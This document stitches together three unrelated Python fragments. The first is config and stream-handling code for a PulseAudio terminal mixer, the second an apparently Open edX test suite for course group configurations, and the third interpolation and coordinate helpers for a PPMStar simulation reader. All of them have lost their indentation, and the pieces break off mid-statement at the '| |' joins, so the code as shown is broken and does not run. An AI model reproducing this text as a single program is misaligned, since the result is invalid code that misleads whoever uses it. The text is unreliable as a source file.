min_volume = 0.01 # relative value, displayed as "0%"
volume_type = 'flat' # 'flat', 'log' (base=e) or 'log-N' where N is logarithm base (int/float)
volume_after_max = False # whether volume is allowed to be raised beyond max value manually
use_device_name = False
use_media_name = False
placeholder_media_names = [ # avoid displaying these, as they're not informative
'audio stream', 'AudioStream', 'Output', 'Playback',
'Playback Stream', 'ALSA Playback', 'Simple DirectMedia Layer' ]
name_len_max = 100
name_cut_from = 'left' # "left" or "right"
name_show_level = True
overkill_redraw = False # if terminal gets resized often, might cause noticeable flickering
overkill_updates = False # always refresh lists of sinks/streams from scratch
verbose = False
reconnect = True
show_stored_values = True
show_controls = True
stream_params = stream_params_reapply = None
char_name_replace_broken = '_'
char_bar_fill = '#'
char_bar_empty = '-'
char_bar_softvol = 'X'
focus_default = 'first' # either "first" or "last"
focus_new_items = True
focus_new_items_delay = 5.0 # min seconds since last focus change to trigger this
# Whether to wrap focus when going past first/last item
focus_wrap_first = False
focus_wrap_last = False
event_proc_delay = 0.0 # 0 - disable
force_refresh_interval = 0.0 # 0 or negative - disable
# These are set for volume_type and operate on normalized (mixer) 0-1.0 values
_vol_cap = staticmethod(lambda v: min(1.0, max(0, v)))
_vol_type_set = _vol_type_get = lambda s,v: s._vol_cap(v)
# Volume calculation funcs convert pulse -> mixer values (get) or vice-versa (set)
_vol_calc_get = lambda conf, vol_pulse: conf._vol_type_get(
(vol_pulse - conf.min_volume) / (conf.max_volume - conf.min_volume) )
_vol_calc_set = ( lambda conf, vol:
conf._vol_type_set(vol) * (conf.max_volume - conf.min_volume) + conf.min_volume )
@staticmethod
def parse_bool(val, _states={
'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False }):
try: return _states[val.lower()]
except KeyError: raise ValueError(val)
def conf_read(path=None, base=None, **overrides):
conf, conf_file = base or Conf(),\
os.path.expanduser(path or conf_read.path_default)
try: conf_file = open(conf_file)
except (OSError, IOError) as err: pass
else: conf_update_from_file(conf, conf_file, overrides)
return conf
conf_read.path_default = '~/.pulseaudio-mixer-cli.cfg'
def conf_update_from_file(conf, path_or_file, overrides):
if isinstance(path_or_file, str): path_or_file = open(path_or_file)
with path_or_file as src:
config = configparser.RawConfigParser(
allow_no_value=True, inline_comment_prefixes=(';',) )
try: config.read_file(src)
except configparser.MissingSectionHeaderError:
src.seek(0)
src = src.read()
src = io.StringIO('[default]' + ('\r\n' if '\r\n' in src else '\n') + src)
config.read_file(src)
for k in dir(conf):
if k.startswith('_'): continue
v = getattr(conf, k)
if k in overrides:
setattr(conf, k, overrides[k])
continue
if isinstance(v, str): get_val = lambda *a: str(config.get(*a))
elif isinstance(v, bool): get_val = config.getboolean
elif isinstance(v, int): get_val = config.getint
elif isinstance(v, float): get_val = lambda *a: float(config.get(*a))
else: continue # values with other types cannot be specified in config
for k_conf in k, k.replace('_', '-'):
try: setattr(conf, k, get_val('default', k_conf))
except configparser.Error: pass
if conf.volume_after_max:
conf._vol_cap = lambda v: max(0, v)
if conf.volume_type != 'flat':
if conf.volume_type == 'log': vol_log_base = math.e
elif conf.volume_type.startswith('log-'):
vol_log_base = max(1.0000001, float(conf.volume_type.split('-', 1)[-1]))
else: raise ValueError(f'Unrecognized volume_type value: {conf.volume_type!r}')
conf._vol_type_get = lambda v,b=vol_log_base: conf._vol_cap(math.log(v * (b - 1) + 1, b))
conf._vol_type_set = lambda v,b=vol_log_base: (b ** conf._vol_cap(v) - 1) / (b - 1)
conf.stream_params = OrderedDict(conf.stream_params or dict())
conf.stream_params_reapply = list() # ones to re-apply on every event
for sec in config.sections():
if not re.search(r'^stream\b.', sec): continue
params = list()
for k, v in config.items(sec):
match = re.search(r'^(match|equals)\[(.*)\]$', k)
if match:
v = re.compile(r'^{}$'.format(re.escape(v)) if match.group(1) == 'equals' else v)
params.append(('match', match.group(2), v))
else: params.append(('set', k, v))
if k == 'reapply' and conf.parse_bool(v):
conf.stream_params_reapply.append(sec)
conf.stream_params[sec] = params
class PAMixerMenuItem:
name, volume, muted = '', 0, False
menu = uid = text = None
def muted_toggle(self): self.muted = not self.muted
def volume_change(self, delta):
log.debug('Volume update: {} -> {} [{}]', self.volume, self.volume + delta, delta)
self.volume += delta
def special_action(self, key, key_match): pass
def get_next(self, m=1):
return self.menu.item_after(self, m=m) if self.menu else self
def get_prev(self, m=1):
return self.menu.item_before(self, m=m) if self.menu else self
class PAMixerMenu:
focus_policies = dict(first=op.itemgetter(0), last=op.itemgetter(-1))
items, controls, conf = tuple(), OrderedDict(), Conf()
def update(self, incremental=False): return
@property
def item_list(self): return list(self.items) # for display only
def item_default(self, n=None):
items = self.item_list
if not items: return
idx = None
if n is not None: idx = max(0, min(n, len(items)-1))
return items[idx] if idx is not None\
else self.focus_policies[self.conf.focus_default](items)
def item_newer(self, ts): return
def item_id(self, item): return item.uid
def item_shift(self, item=None, m=0, t=None):
if t and self.items:
n = dict(first=0, last=len(self.items)-1).get(t)
assert n is not None, t
return self.items[n]
if item:
for n, item2 in enumerate(self.items):
if self.item_id(item2) == self.item_id(item):
n_max, n = len(self.items) - 1, n + m
if m > 0 and n > n_max: n = 0 if self.conf.focus_wrap_last else n_max
elif m < 0 and n < 0: n = n_max if self.conf.focus_wrap_first else 0
return self.items[n]
return self.item_default()
def item_after(self, item=None, m=1):
return self.item_shift(item=item, m=m)
def item_before(self, item=None, m=1):
return self.item_shift(item=item, m=-m)
class PAMixerReconnect(Exception): pass
class PAMixerEvent:
__slots__ = 'obj_type obj_index t'.split()
pulsectl_facility_map = dict(sink='sink', sink_input='stream')
@classmethod
def from_pulsectl_ev(cls, ev):
obj_type = cls.pulsectl_facility_map.get(ev.facility)
if not obj_type: return
return cls(obj_type, ev.index, ev.t)
def __init__(self, obj_type, obj_index, t=None):
self.obj_type, self.obj_index, self.t = obj_type, obj_index, t
def __str__(self): return repr(dict((k, getattr(self, k)) for k in self.__slots__))
class PAMixerStreamsItem(PAMixerMenuItem):
name = '???'
def __init__(self, streams, obj_t, obj_id, obj):
self.menu, self.conf = streams, streams.conf
self.t, self.uid = obj_t, obj_id
self.hidden = self.name_custom = False
self.created_ts = time.monotonic()
self.update(obj)
if self.conf.dump_stream_params:
from pprint import pprint
dump = OrderedDict(uid=self.uid, name=self.name)
dump['props'] = sorted(self.obj.proplist.items())
pprint(dump, sys.stderr)
sys.stderr.flush()
def __repr__(self):
return '<{}[{:x}] {}[{}]: {}>'.format(
self.__class__.__name__, id(self), self.t, self.uid, self.name )
def update(self, obj=None):
if obj: self.obj = obj
if not self.name_custom: self.name_update()
def name_update(self, name=None):
if not name: name = self._get_name() or 'knob'
else: self.name_custom = True
self.name_base = self.name = name
def _get_name(self):
try: return self._get_name_descriptive()
except Exception as err:
if self.menu.fatal: raise
log.info('Failed to get descriptive name for {!r} ({}): {}', self.t, self.uid, err)
return self.t
def _get_name_descriptive(self):
'Can probably fail with KeyError if something is really wrong with stream/device props.'
ext, props = None, dict(
(k, self._strip_noise_bytes(v, self.conf.char_name_replace_broken))
for k, v in self.obj.proplist.items() )
if self.t == 'stream':
if self.conf.use_media_name:
name = props.get('media.name')
if name and name not in self.conf.placeholder_media_names: return name
try: name = props['application.name']
except KeyError: name = props['media.name'] # some synthetic stream with non-descriptive name
ext = '({application.process.user}@'\
'{application.process.host}:{application.process.id})'
elif self.t == 'sink':
if self.conf.use_device_name: name = self.obj.name
else:
name = props.get('alsa.id')\
or props.get('device.description') or props.get('device.api')
if not name:
try: name = '{}.{}'.format(props['device.api'], props['device.string'])
except KeyError: name = props['device.description']
ext = '({device.profile.name}@{alsa.driver_name})'
else: raise KeyError('Unknown streams-item type (for naming): {}'.format(self.t))
if ext:
try:
name = '{} {}'.format( name,
re.sub(r'\{([^}]+)\}', r'{}', ext).format(
*op.itemgetter(*re.findall(r'\{([^}]+)\}', ext))(props) ) )
except KeyError as err:
log.debug( 'Unable to get extended descriptive name'
' (type: {!r}, uid: {}) due to missing key: {}', self.t, self.uid, err )
return name
def _strip_noise_bytes(self, obj, replace='_'):
'''Make sure there arent any random weird chars that dont belong to any alphabet.
Only ascii non-letters are allowed, as fancy symbols don't seem to work well with curses.'''
if not isinstance(obj, str): obj = str(obj)
obj_ucs = list()
for uc in obj:
try:
unicodedata.name(uc)
if unicodedata.category(uc) != 'Ll': uc.encode('ascii')
except (ValueError, UnicodeEncodeError):
if replace: obj_ucs.append(replace)
else: obj_ucs.append(uc)
return ''.join(obj_ucs)
@property
def muted(self):
return bool(self.obj.mute)
@muted.setter
def muted(self, val):
self.obj.mute = int(val)
with self.menu.update_wakeup() as pulse: pulse.mute(self.obj, self.obj.mute)
@property
def volume(self):
'Volume as one float in 0-1 range.'
return self.conf._vol_calc_get(self.obj.volume.value_flat)
@volume.setter
def volume(self, val):
val_pulse = self.conf._vol_calc_set(val)
log.debug('Setting volume: {} (pulse: {}) for {}', val, val_pulse, self)
# log.debug(
# 'Volume: [mixer: {:.4f} -> {:.4f}] [pulse: {:.4f} -> {:.4f}]',
# self.volume, val, self.obj.volume.value_flat, val_pulse )
with self.menu.update_wakeup() as pulse: pulse.volume_set_all_chans(self.obj, val_pulse)
def special_action(self, ui, key):
if ui.key_match(key, 'i'):
with self.menu.update_wakeup() as pulse:
ui.info = PAMixerStreamInfo(self.obj.proplist)
ui.mode_switch('info')
@property
def port(self):
if self.t != 'sink': return
return self.obj.port_active
@port.setter
def port(self, name):
if self.t != 'sink':
log.warning( 'Setting ports is only'
' available for {!r}-type streams, not {!r}-type', 'sink', self.t )
with self.menu.update_wakeup() as pulse: pulse.port_set(self.obj, name)
class PAMixerStreams(PAMixerMenu):
controls = dict(i='show item info')
def __init__(self, pulse, conf=None, fatal=False):
self.pulse, self.fatal, self.conf = pulse, fatal, conf or Conf()
self.items, self.item_objs = list(), OrderedDict()
self.connected, self._updates = None, deque()
self._pulse_hold, self._pulse_lock = threading.Lock(), threading.Lock()
def update(self, incremental=False):
while True:
try: ev = self._updates.popleft()
except: ev = None
# Restarts whole thing with new pulse connection
if self.connected is False: raise PAMixerReconnect()
# Add/remove/update items
if not self.conf.overkill_updates and incremental and not ev: break
obj_new, obj_gone = set(), set()
obj_id_func = lambda t,index: '{}-{}'.format(t, index)
if not ev: obj_gone.update(self.item_objs) # i.e. replace whole list
with self.update_wakeup(trap_errors=False) as pulse:
for obj_t, obj_list_func, obj_info_func in\
[ ('sink', pulse.sink_list, pulse.sink_info),
('stream', pulse.sink_input_list, pulse.sink_input_info) ]:
obj_list_full = obj_list = None # "replace all" vs "new/update X"
if | |
the course contains the new group configuration.
user_partitions = self.course.user_partitions
self.assertEqual(len(user_partitions), 1)
self.assertEqual(user_partitions[0].name, '<NAME>')
self.assertEqual(len(user_partitions[0].groups), 2)
self.assertEqual(user_partitions[0].groups[0].name, 'Group A')
self.assertEqual(user_partitions[0].groups[1].name, 'Group B')
self.assertEqual(user_partitions[0].parameters, {})
def test_can_edit_group_configuration(self):
"""
Edit group configuration and check its id and modified fields.
"""
self._add_user_partitions()
self.save_course()
expected = {
'id': self.ID,
'name': '<NAME>',
'scheme': 'random',
'description': 'New Test description',
'version': UserPartition.VERSION,
'groups': [
{'id': 0, 'name': 'New Group Name', 'version': 1},
{'id': 2, 'name': 'Group C', 'version': 1},
],
'usage': [],
'parameters': {},
'active': True,
}
response = self.client.put(
self._url(),
data=json.dumps(expected),
content_type="application/json",
HTTP_ACCEPT="application/json",
HTTP_X_REQUESTED_WITH="XMLHttpRequest",
)
content = json.loads(response.content.decode('utf-8'))
self.assertEqual(content, expected)
self.reload_course()
# Verify that user_partitions is properly updated in the course.
user_partititons = self.course.user_partitions
self.assertEqual(len(user_partititons), 1)
self.assertEqual(user_partititons[0].name, 'New Test name')
self.assertEqual(len(user_partititons[0].groups), 2)
self.assertEqual(user_partititons[0].groups[0].name, 'New Group Name')
self.assertEqual(user_partititons[0].groups[1].name, 'Group C')
self.assertEqual(user_partititons[0].parameters, {})
def test_can_delete_group_configuration(self):
"""
Delete group configuration and check user partitions.
"""
self._add_user_partitions(count=2)
self.save_course()
response = self.client.delete(
self._url(cid=0),
content_type="application/json",
HTTP_ACCEPT="application/json",
HTTP_X_REQUESTED_WITH="XMLHttpRequest",
)
self.assertEqual(response.status_code, 204)
self.reload_course()
# Verify that user_partitions is properly updated in the course.
user_partititons = self.course.user_partitions
self.assertEqual(len(user_partititons), 1)
self.assertEqual(user_partititons[0].name, 'Name 1')
def test_cannot_delete_used_group_configuration(self):
"""
Cannot delete group configuration if it is in use.
"""
self._add_user_partitions(count=2)
self._create_content_experiment(cid=0)
response = self.client.delete(
self._url(cid=0),
content_type="application/json",
HTTP_ACCEPT="application/json",
HTTP_X_REQUESTED_WITH="XMLHttpRequest",
)
self.assertEqual(response.status_code, 400)
content = json.loads(response.content.decode('utf-8'))
self.assertTrue(content['error'])
self.reload_course()
# Verify that user_partitions is still the same.
user_partititons = self.course.user_partitions
self.assertEqual(len(user_partititons), 2)
self.assertEqual(user_partititons[0].name, 'Name 0')
def test_cannot_delete_non_existent_group_configuration(self):
"""
Cannot delete group configuration if it is doesn't exist.
"""
self._add_user_partitions(count=2)
response = self.client.delete(
self._url(cid=999),
content_type="application/json",
HTTP_ACCEPT="application/json",
HTTP_X_REQUESTED_WITH="XMLHttpRequest",
)
self.assertEqual(response.status_code, 404)
# Verify that user_partitions is still the same.
user_partititons = self.course.user_partitions
self.assertEqual(len(user_partititons), 2)
self.assertEqual(user_partititons[0].name, 'Name 0')
@ddt.data(CONTENT_TYPE_GATING_SCHEME, ENROLLMENT_SCHEME)
def test_cannot_create_restricted_group_configuration(self, scheme_id):
"""
Test that you cannot create a restricted group configuration.
"""
group_config = dict(GROUP_CONFIGURATION_JSON)
group_config['scheme'] = scheme_id
group_config.setdefault('parameters', {})['course_id'] = str(self.course.id)
response = self.client.ajax_post(
self._url(),
data=group_config
)
self.assertEqual(response.status_code, 400)
@ddt.data(
(CONTENT_TYPE_GATING_SCHEME, CONTENT_GATING_PARTITION_ID),
(ENROLLMENT_SCHEME, ENROLLMENT_TRACK_PARTITION_ID),
)
@ddt.unpack
def test_cannot_edit_restricted_group_configuration(self, scheme_id, partition_id):
"""
Test that you cannot edit a restricted group configuration.
"""
group_config = dict(GROUP_CONFIGURATION_JSON)
group_config['scheme'] = scheme_id
group_config.setdefault('parameters', {})['course_id'] = str(self.course.id)
response = self.client.put(
self._url(cid=partition_id),
data=json.dumps(group_config),
content_type="application/json",
HTTP_ACCEPT="application/json",
HTTP_X_REQUESTED_WITH="XMLHttpRequest",
)
self.assertEqual(response.status_code, 400)
@ddt.ddt
class GroupConfigurationsUsageInfoTestCase(CourseTestCase, HelperMethods):
"""
Tests for usage information of configurations and content groups.
"""
def _get_user_partition(self, scheme):
"""
Returns the first user partition with the specified scheme.
"""
for group in GroupConfiguration.get_all_user_partition_details(self.store, self.course):
if group['scheme'] == scheme:
return group
return None
def _get_expected_content_group(self, usage_for_group):
"""
Returns the expected configuration with particular usage.
"""
return {
'id': 0,
'name': 'Name 0',
'scheme': 'cohort',
'description': 'Description 0',
'version': UserPartition.VERSION,
'groups': [
{'id': 0, 'name': 'Group A', 'version': 1, 'usage': []},
{'id': 1, 'name': 'Group B', 'version': 1, 'usage': usage_for_group},
{'id': 2, 'name': 'Group C', 'version': 1, 'usage': []},
],
'parameters': {},
'active': True,
}
def test_content_group_not_used(self):
"""
Test that right data structure will be created if content group is not used.
"""
self._add_user_partitions(scheme_id='cohort')
actual = self._get_user_partition('cohort')
expected = self._get_expected_content_group(usage_for_group=[])
self.assertEqual(actual, expected)
def test_can_get_correct_usage_info_when_special_characters_are_in_content(self):
"""
Test if content group json updated successfully with usage information.
"""
self._add_user_partitions(count=1, scheme_id='cohort')
vertical, __ = self._create_problem_with_content_group(
cid=0, group_id=1, name_suffix='0', special_characters="JOSÉ ANDRÉS"
)
actual = self._get_user_partition('cohort')
expected = self._get_expected_content_group(
usage_for_group=[
{
'url': f"/container/{vertical.location}",
'label': "Test Unit 0 / Test Problem 0JOSÉ ANDRÉS"
}
]
)
self.assertEqual(actual, expected)
def test_can_get_correct_usage_info_for_content_groups(self):
"""
Test if content group json updated successfully with usage information.
"""
self._add_user_partitions(count=1, scheme_id='cohort')
vertical, __ = self._create_problem_with_content_group(cid=0, group_id=1, name_suffix='0')
actual = self._get_user_partition('cohort')
expected = self._get_expected_content_group(usage_for_group=[
{
'url': f'/container/{vertical.location}',
'label': 'Test Unit 0 / Test Problem 0'
}
])
self.assertEqual(actual, expected)
@ddt.data(ModuleStoreEnum.Type.mongo, ModuleStoreEnum.Type.split)
def test_can_get_correct_usage_info_with_orphan(self, module_store_type):
"""
Test if content group json updated successfully with usage information
even if there is an orphan in content group.
"""
self.course = CourseFactory.create(default_store=module_store_type)
self._add_user_partitions(count=1, scheme_id='cohort')
vertical, __ = self._create_problem_with_content_group(cid=0, group_id=1, name_suffix='0', orphan=True)
# Assert that there is an orphan in the course, and that it's the vertical
self.assertEqual(len(self.store.get_orphans(self.course.id)), 1)
self.assertIn(vertical.location, self.store.get_orphans(self.course.id))
# Get the expected content group information based on module store.
if module_store_type == ModuleStoreEnum.Type.mongo:
expected = self._get_expected_content_group(usage_for_group=[
{
'url': f'/container/{vertical.location}',
'label': 'Test Unit 0 / Test Problem 0'
}
])
else:
expected = self._get_expected_content_group(usage_for_group=[])
# Get the actual content group information
actual = self._get_user_partition('cohort')
# Assert that actual content group information is same as expected one.
self.assertEqual(actual, expected)
def test_can_use_one_content_group_in_multiple_problems(self):
"""
Test if multiple problems are present in usage info when they use same
content group.
"""
self._add_user_partitions(scheme_id='cohort')
vertical, __ = self._create_problem_with_content_group(cid=0, group_id=1, name_suffix='0')
vertical1, __ = self._create_problem_with_content_group(cid=0, group_id=1, name_suffix='1')
actual = self._get_user_partition('cohort')
expected = self._get_expected_content_group(usage_for_group=[
{
'url': f'/container/{vertical1.location}',
'label': 'Test Unit 1 / Test Problem 1'
},
{
'url': f'/container/{vertical.location}',
'label': 'Test Unit 0 / Test Problem 0'
}
])
self.assertEqual(actual, expected)
def test_group_configuration_not_used(self):
"""
Test that right data structure will be created if group configuration is not used.
"""
self._add_user_partitions()
actual = GroupConfiguration.get_split_test_partitions_with_usage(self.store, self.course)
expected = [{
'id': 0,
'name': 'Name 0',
'scheme': 'random',
'description': 'Description 0',
'version': UserPartition.VERSION,
'groups': [
{'id': 0, 'name': 'Group A', 'version': 1},
{'id': 1, 'name': 'Group B', 'version': 1},
{'id': 2, 'name': 'Group C', 'version': 1},
],
'usage': [],
'parameters': {},
'active': True,
}]
self.assertEqual(actual, expected)
def test_can_get_correct_usage_info_for_split_test(self):
"""
When a split test is created and content group access is set for a problem within a group,
the usage info should return a url to the split test, not to the group.
"""
# Create user partition for groups in the split test,
# and another partition to set group access for the problem within the split test.
self._add_user_partitions(count=1)
self.course.user_partitions += [
UserPartition(
id=1,
name='Cohort User Partition',
scheme=UserPartition.get_scheme('cohort'),
description='Cohort User Partition',
groups=[
Group(id=3, name="Problem Group")
],
),
]
self.store.update_item(self.course, ModuleStoreEnum.UserID.test)
__, split_test, problem = self._create_content_experiment(cid=0, name_suffix='0', group_id=3, cid_for_problem=1) # lint-amnesty, pylint: disable=unused-variable
expected = {
'id': 1,
'name': 'Cohort User Partition',
'scheme': 'cohort',
'description': 'Cohort User Partition',
'version': UserPartition.VERSION,
'groups': [
{'id': 3, 'name': 'Problem Group', 'version': 1, 'usage': [
{
'url': f'/container/{split_test.location}',
'label': 'Condition 1 vertical / Test Problem'
}
]},
],
'parameters': {},
'active': True,
}
actual = self._get_user_partition('cohort')
self.assertEqual(actual, expected)
def test_can_get_correct_usage_info_for_unit(self):
"""
When group access is set on the unit level, the usage info should return a url to the unit, not
the sequential parent of the unit.
"""
self.course.user_partitions = [
UserPartition(
id=0,
name='User Partition',
scheme=UserPartition.get_scheme('cohort'),
description='User Partition',
groups=[
Group(id=0, name="Group")
],
),
]
vertical, __ = self._create_problem_with_content_group(
cid=0, group_id=0, name_suffix='0'
)
self.client.ajax_post(
reverse_usage_url("xblock_handler", vertical.location),
data={'metadata': {'group_access': {0: [0]}}}
)
actual = self._get_user_partition('cohort')
# order of usage list is arbitrary, sort for reliable comparison
actual['groups'][0]['usage'].sort(key=itemgetter('label'))
expected = {
'id': 0,
'name': 'User Partition',
'scheme': 'cohort',
'description': 'User Partition',
'version': UserPartition.VERSION,
'groups': [
{'id': 0, 'name': 'Group', 'version': 1, 'usage': [
{
'url': f"/container/{vertical.location}",
'label': "Test Subsection 0 / Test Unit 0"
},
{
'url': f"/container/{vertical.location}",
'label': "Test Unit 0 / Test Problem 0"
}
]},
],
'parameters': {},
'active': True,
}
self.maxDiff = None
assert actual == expected
def test_can_get_correct_usage_info(self):
"""
Test if group configurations json updated successfully with usage information.
"""
self._add_user_partitions(count=2)
__, split_test, __ = self._create_content_experiment(cid=0, name_suffix='0')
self._create_content_experiment(name_suffix='1')
actual = GroupConfiguration.get_split_test_partitions_with_usage(self.store, self.course)
expected = [{
'id': 0,
'name': 'Name 0',
'scheme': 'random',
'description': 'Description 0',
'version': UserPartition.VERSION,
'groups': [
{'id': 0, 'name': 'Group A', 'version': 1},
{'id': 1, 'name': 'Group B', 'version': 1},
{'id': 2, 'name': 'Group C', 'version': 1},
],
'usage': [{
'url': f'/container/{split_test.location}',
'label': 'Test Unit 0 / Test Content Experiment 0',
'validation': None,
}],
'parameters': {},
'active': True,
}, {
'id': 1,
'name': 'Name 1',
'scheme': 'random',
'description': 'Description 1',
'version': UserPartition.VERSION,
'groups': [
{'id': 0, 'name': 'Group A', 'version': 1},
{'id': 1, 'name': 'Group B', 'version': 1},
{'id': 2, 'name': 'Group C', 'version': 1},
],
'usage': [],
'parameters': {},
'active': True,
}]
self.assertEqual(actual, expected)
def test_can_get_usage_info_when_special_characters_are_used(self):
"""
Test if group configurations json updated successfully when special
characters are being used in content experiment
"""
self._add_user_partitions(count=1)
__, split_test, __ = self._create_content_experiment(cid=0, name_suffix='0', special_characters="<NAME>")
actual = GroupConfiguration.get_split_test_partitions_with_usage(self.store, self.course, )
expected = [{
'id': 0,
'name': 'Name 0',
'scheme': 'random',
'description': 'Description 0',
'version': UserPartition.VERSION,
'groups': [
{'id': 0, 'name': 'Group A', 'version': 1},
{'id': | |
values
self._phi = np.arctan2(self._yc, self._xc)
self._phi[self._phi < 0] += 2. * np.pi
# in some cases, it is more convenient to work with xc[z,y,x] so lets store views
self._theta_view = self._theta.view()
self._theta_view.shape = (self.moms_ngridpoints, self.moms_ngridpoints, self.moms_ngridpoints)
self._phi_view = self._phi.view()
self._phi_view.shape = (self.moms_ngridpoints, self.moms_ngridpoints, self.moms_ngridpoints)
# ok all is good, set our flag that everything is good
self._sgrid_exists = True
return True
else:
return True
def _get_mgrid(self):
'''
Constructs the PPMStar mollweide spherical coordinates grid
Returns
-------
Boolean
True on success.
False on failure.
'''
# check if we already have this in memory or not
if not self._mollweide_exists:
# ok we now check to see if spherical coordinates has been made or not
if not self._sgrid_exists:
self._get_sgrid()
# we have a transform method, let's use it
self._mollweide_theta, self._mollweide_phi = self._transform_mollweide(self._theta.copy(),
self._phi.copy())
# DS: I will save this code, it may be used in the future
# and is a nice way of calculating this directly
# # we have the radius already, need theta and phi
# self._mollweide_theta = np.arctan2(self._zc,np.sqrt(np.power(self._xc,2.0) + np.power(self._yc,2.0)))
# # with phi we have a problem with the way np.arctan2 works, we get negative
# # angles in quadrants 3 and 4. This is what we want
# self._mollweide_phi = np.arctan2(self._yc,self._xc)
# in some cases, it is more convenient to work with xc[z,y,x] so lets store views
self._mollweide_theta_view = self._mollweide_theta.view()
self._mollweide_theta_view.shape = (self.moms_ngridpoints, self.moms_ngridpoints, self.moms_ngridpoints)
self._mollweide_phi_view = self._mollweide_phi.view()
self._mollweide_phi_view.shape = (self.moms_ngridpoints, self.moms_ngridpoints, self.moms_ngridpoints)
# ok all is good, set our flag that everything is good
self._mollweide_exists = True
return True
else:
return True
def _get_interpolation(self, var, igrid, method):
'''
This function controls the which method of interpolation is done and how it is done.
Parameters
----------
var: np.ndarray
The quantity on the grid
igrid: np.ndarray
The array that contains all of the points that are to be interpolated to
igrid.shape = [ninterpolation_points,3]
igrid[:,0] = z, igrid[:,1] = y, igrid[:,2] = x
method: str
'trilinear': Use a trilinear method to interpolate onto the points on igrid
'moments': Use a moments averaging within a cell and using a quadratic function
as the form for the interpolation
Returns
-------
var_interp: np.ndarray
The var interpolated onto the 'igrid' points
'''
# what method?
# trilinear
if method == self._interpolation_methods[0]:
# first we create interpolation object from scipy
linear_interp = scipy.interpolate.RegularGridInterpolator(
(self._unique_coord, self._unique_coord, self._unique_coord), var)
# we have a "flattened" in radii igrid, just pass all arguments to the interpolator
var_interp = linear_interp(igrid)
# we will exit here
return var_interp
# moments
else:
# before I begin, are there any igrid values that are on the boundary or outside of it
upper_bound = np.max(self._unique_coord) - 1/2. * np.mean(np.abs(np.diff(self._unique_coord)))
lower_bound = np.min(self._unique_coord) + 1/2. * np.mean(np.abs(np.diff(self._unique_coord)))
# I will count zeros
out_of_bounds = np.logical_or((igrid > upper_bound),(igrid < lower_bound))
if np.count_nonzero(out_of_bounds.flatten()) > 0:
err = 'There are {:d} grid points that are at or outside of the boundary of the simulation'\
.format(np.count_nonzero(out_of_bounds.flatten()))
self._messenger.error(err)
raise ValueError
# first find the indices that have the closest igrid to our unique coordinates
# store the indexes
x_idx = np.zeros((np.shape(igrid)[0]),dtype=np.intp)
y_idx = np.zeros((np.shape(igrid)[0]),dtype=np.intp)
z_idx = np.zeros((np.shape(igrid)[0]),dtype=np.intp)
# find the index of unique coord that is closest to igrid values
x_idx = np.searchsorted(self._unique_coord,igrid[:,2])
y_idx = np.searchsorted(self._unique_coord,igrid[:,1])
z_idx = np.searchsorted(self._unique_coord,igrid[:,0])
# search sorted finds index to the "right" in value from the igrid points. However, we need to find the index
# where igrid points are closest to for appropriate interpolation. This corrects for that
x_idx[np.where((self._unique_coord[x_idx] - igrid[:,2]) > np.mean(np.abs(np.diff(self._unique_coord)))/2.)] -= 1
y_idx[np.where((self._unique_coord[y_idx] - igrid[:,1]) > np.mean(np.abs(np.diff(self._unique_coord)))/2.)] -= 1
z_idx[np.where((self._unique_coord[z_idx] - igrid[:,0]) > np.mean(np.abs(np.diff(self._unique_coord)))/2.)] -= 1
# now we call the actual interpolation
var_interp = self._interpolation_moments(var, igrid, x_idx, y_idx, z_idx)
return var_interp
def _get_jacobian(self, x, y, z, r):
'''
This function creates the Jacobian to convert quantities defined in cartesian
coordinates to spherical coordinates. This is a very large array of
9 x self.moms_gridresolution which will be stored in memory. It is defined as the "physics"
spherical coordinates so the array has rhat, theta-hat, phi-hat -> xhat, yhat, zhat
Parameters
----------
x: np.ndarray
The x coordinates of the grid
y: np.ndarray
The y coordinates of the grid
z: np.ndarray
The z coordinates of the grid
r: np.ndarray
The r coordinates of the grid
Returns
-------
jacobian: np.ndarray
The jacobian for the transformation between cartesian and spherical coordinates
'''
# are we working with a flattened, (x,y,z) or a matrix?
if len(x.shape) > 1:
# since we work in spherical coordinates, the phi-hat dot z-hat component is zero, so it is 8x(nxnxn)
jacobian = np.zeros((8, x.shape[0], y.shape[0], z.shape[0]),dtype='float32')
else:
# since we work in spherical coordinates, the phi-hat dot z-hat component is zero, so it is 8x(n)
jacobian = np.zeros((8, x.shape[0]))
# need the cylindrical radius
rcyl = np.sqrt(np.power(x,2.0) + np.power(y,2.0))
# rhat -> xhat, yhat, zhat
np.divide(x,r,out=jacobian[0])
np.divide(y,r,out=jacobian[1])
np.divide(z,r,out=jacobian[2])
# theta-hat -> xhat, yhat, zhat
# we use "placeholders" of jacobian slots to not make new memory
np.divide(np.multiply(x, z, out=jacobian[3]), np.multiply(r, rcyl, out=jacobian[4]),
out = jacobian[3])
np.divide(np.multiply(y, z, out=jacobian[4]), np.multiply(r, rcyl, out=jacobian[5]),
out = jacobian[4])
np.divide(-rcyl, r, out=jacobian[5])
# phi-hat -> xhat, yhat, zhat
np.divide(-y, rcyl, out=jacobian[6])
np.divide(x, rcyl, out=jacobian[7])
# phi-hat dot z-hat = 0
# jacobian transformation matrix has been computed
return jacobian
def _get(self, varloc, fname=None):
'''
Returns the variable var which is referenced with varloc at a specific dump/time in the
simulation. This is used internally for var claims that will be references that are garbage
collected in a method. IMPORTANT: The arrays are NOT flattened but if they need
to be a NEW array will be made
Parameters
----------
varloc: str, int
String: for the variable you want if defined on instantiation
Int: index location of the variable you want
fname: None,int
None: default option, will grab current dump
int: Dump number
Returns
-------
var: np.ndarray
Variable on the grid
'''
# if fname is None, use current dump
if fname == None:
fname = self.what_dump_am_i
# quick check if we already have the momsdata in memory
if str(fname) in self._many_momsdata:
try:
return self._many_momsdata[str(fname)].get(self._varloc[str(varloc)])
except KeyError as e:
err = 'Invalid key for varloc. A list of keys: \n'
err += ', '.join(sorted(map(str,self._varloc.keys())))
self._messenger.error(err)
raise e
else:
# grab a new datacube. This updates self._momsdata.data
self._get_dump(fname)
try:
return self._many_momsdata[str(fname)].get(self._varloc[str(varloc)])
except KeyError as e:
err = 'Invalid key for varloc. A list of keys: \n'
err += ', '.join(sorted(map(str,self._varloc.keys())))
self._messenger.error(err)
raise e
# def get_ray_interpolation(self, radius, theta, phi, nrays):
# """
# """
def get_dump_list(self):
'''
Returns a list of dumps available.
Returns
-------
dumps: list
List of dumps that are available
'''
return list(self._dumps)
def get_interpolation(self, varloc, igrid, fname=None, method='trilinear', logvar=False):
'''
Returns the interpolated array of values (with a particular method) of the var given by
'varloc' at the [z,y,x] grid points of igrid
Parameters
----------
varloc: str, int, np.ndarray
String: for the variable you want if defined on instantiation
Int: index location of the variable you want
